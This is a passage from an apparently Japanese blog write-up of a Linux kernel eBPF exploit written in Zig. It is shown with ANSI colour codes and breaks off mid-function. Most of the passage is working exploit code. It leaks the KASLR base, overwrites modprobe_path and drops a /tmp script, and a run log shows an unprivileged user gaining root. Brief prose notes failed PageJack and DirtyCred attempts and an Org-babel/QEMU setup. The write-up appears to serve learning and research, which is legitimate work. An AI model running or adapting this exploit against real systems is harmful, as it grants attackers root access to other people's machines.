�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// idk why but adding \x00\x08 to the end doesn't work as expected�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mbpf_helper�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37minsns�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"foobared"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m2�[0m�[1m�[37m]�[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m2�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mi�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[37mmap_lookup_elem�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mtoBytes�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37mi�[0m�[1m�[36m+�[0m�[1m�[36m1�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mi�[0m�[1m�[37m]));�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[37mcall_decoder�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m1�[0m�[1m�[37m])[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m5�[0m�[1m�[37m])�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[37m �[0m�[1m�[37mBPF_USER_RND_U32�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mconfirm_unpriviledged_bpf�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mkaslr_leak�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Kernel base: 0x{s}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfmt�[0m�[1m�[37m.�[0m�[37mbytesToHex�[0m�[1m�[37m(�[0m�[37mbigEndianify�[0m�[1m�[37m(�[0m�[1m�[36m8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[36m+�[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlower�[0m�[1m�[37m)});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37moverwrite_modprobe_path�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37mmodprobePath�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37mwhoami: unknown uid 1337�[0m
�[1m�[37m[INFO] User is not bpf_capable�[0m
�[1m�[37m[INFO] Kernel base: 0xffffffff9b800000�[0m
�[1m�[37m[INFO] You won!!�[0m
�[1m�[37mroot�[0m
(DIR) 完全なexploit
実は「BPFスタックを使わずに」もexploitしたかったが、できなかった。
(PageJack [10]とDirtyCred
[11]なような術使ったが、でもcred_jarキャッシュが開放したページに配置できなっかた。ヒープ風水は難しいよね。)
== �[1m�[4mOrg-babel部分�[22m�[24m
エクスプロイト開発にはOrg-
babelを活用している(ジュピターノートブックみたいなやつ⸺興味があるなら関連項目は文芸的プログラッミング)。
コードブロックを実行する時にはこうなる:
1. Zigソースは抽出するとコンパイルする
2. rootfsを再作成する
3. QEMUでシェルを実行する、そして入力文字列とコマンド出力の送受信
それだけじゃない!
このページは同じOrg内容でox-hugo [12]でエクスポートした結果だ。
格好いいだろう(少なくとも僕はそう思う)。
以下はこのページで使用される色んな関数だ。
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@import�[0m�[1m�[37m(�[0m�[33m"std"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mos�[0m�[1m�[37m.�[0m�[1m�[37mlinux�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mposix�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mstd_options�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mOptions�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlog_level�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[37m@hasDecl�[0m�[1m�[37m(�[0m�[37m@This�[0m�[1m�[37m(),�[0m�[1m�[37m �[0m�[33m"DEBUG"�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37minfo�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlogFn�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mpawnyableLogger�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mpawnyableLogger�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mlevel�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[1m�[37mLevel�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[37m@Type�[0m�[1m�[37m(.�[0m�[1m�[37menum_literal�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mformat�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37margs�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37manytype�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mprefix�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33m"["�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mlevel_text�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mlevel�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33m"DBUG"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37minfo�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33m"INFO"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mwarn�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33m"WARN"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37merr�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33m"ERRR"�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37mlevel_text�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mascii�[0m�[1m�[37m.�[0m�[37mupperString�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mlevel_text�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[33m"] "�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37mlockStdErr�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37munlockStdErr�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mstderr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mio�[0m�[1m�[37m.�[0m�[37mgetStdErr�[0m�[1m�[37m().�[0m�[37mwriter�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mnosuspend�[0m�[1m�[37m �[0m�[1m�[37mstderr�[0m�[1m�[37m.�[0m�[37mprint�[0m�[1m�[37m(�[0m�[1m�[37mprefix�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37mformat�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[33m"�[0m�[33m\n�[0m�[33m"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37margs�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mbigEndianify�[0m�[1m�[37m(�[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mlen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37mlen�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbufLE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37mlen�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33minline�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mlen�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mi�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mbufLE�[0m�[1m�[37m[�[0m�[1m�[37mi�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mlen�[0m�[1m�[36m-�[0m�[1m�[36m1�[0m�[1m�[36m-�[0m�[1m�[37mi�[0m�[1m�[37m];�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mbufLE�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37m__spinlock�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33minline�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mspin�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mtrue�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37m__spinlock�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mexport�[0m�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37muser_cs�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mexport�[0m�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37muser_ss�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mexport�[0m�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37muser_rsp�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mexport�[0m�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37muser_rflags�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37msaveState�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[37mcallconv�[0m�[1m�[37m(.�[0m�[1m�[37mC�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33masm�[0m�[1m�[37m �[0m�[33mvolatile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\.intel_syntax noprefix�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\mov user_cs, cs�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\mov user_ss, ss�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\mov user_rsp, rsp�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\pushfq�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\pop qword ptr user_rflags�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\.att_syntax�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mwhoami�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"You won!!"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37margs�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[36mnull�[0m�[1m�[37m]�[0m�[1m�[36m?�[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m{�[0m�[33m"/usr/bin/whoami"�[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37menv�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[36mnull�[0m�[1m�[37m]�[0m�[1m�[36m?�[0m�[1m�[37m[�[0m�[1m�[36m*:�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m{};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mexecveZ�[0m�[1m�[37m(�[0m�[33m"/usr/bin/whoami"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37margs�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37margs�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37menv�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37menv�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m]))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mmodprobePath�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"You won!!"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mtmpx�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfs�[0m�[1m�[37m.�[0m�[37mcwd�[0m�[1m�[37m().�[0m�[37mcreateFile�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m"/tmp/x"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mread�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0o777�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmpx�[0m�[1m�[37m.�[0m�[37mwriteAll�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\#!/bin/sh�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\/usr/bin/whoami &> /tmp/whoisit�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m\\chmod 777 /tmp/whoisit�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mtmpx�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37munknown�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mfs�[0m�[1m�[37m.�[0m�[37mcwd�[0m�[1m�[37m().�[0m�[37mcreateFile�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m"/tmp/unknown"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mread�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0o777�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37munknown�[0m�[1m�[37m.�[0m�[37mwriteAll�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m{�[0m�[1m�[36m0xff�[0m�[1m�[37m}�[0m�[1m�[36m**�[0m�[1m�[36m4�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mcatch�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37munknown�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mcorePattern�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"You won!!"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{});�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
